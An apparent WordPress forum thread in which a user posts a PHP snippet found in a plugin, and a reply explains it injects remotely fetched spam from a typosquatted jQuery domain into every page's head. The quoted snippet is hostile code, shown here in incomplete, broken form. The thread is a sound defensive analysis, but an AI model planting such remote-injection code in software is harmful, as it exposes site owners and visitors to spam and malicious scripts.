I found this in a plugin. What does it do? is it dangerous?

I found this in a plugin. What does it do? is it dangerous?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        $jquery = curl_exec($ch);  
        echo "$jquery";
add_action('wp_head', 'wp__head');


It loads a block of markup containing spam (I thought about posting a bit of the source but I don’t want to advertise the content in any way) from a domain that is a close misspelling of the domain– http://jquery.com/— used by jQuery, a reputable and popular Javascript library and one that WordPress includes in the Core. I think the idea is to appear to be loading that library, when in fact loading something very different.

And it is in other ways attempting to appear to be loading jQuery. Notice the variable name $jquery.

It may attempt to load malicious scripts as well. I didn’t check.
I would definitely call it dangerous especially since the content on that page can change anytime the domain controllers feel like it.

At best it is going to damage your site as search engines look down on sites that spread spam.

Don’t use it. It does nothing beneficial for you or for anyone else on the web other than the people who run the site. If you found this on a reputable site, report it to them.

Leave a Comment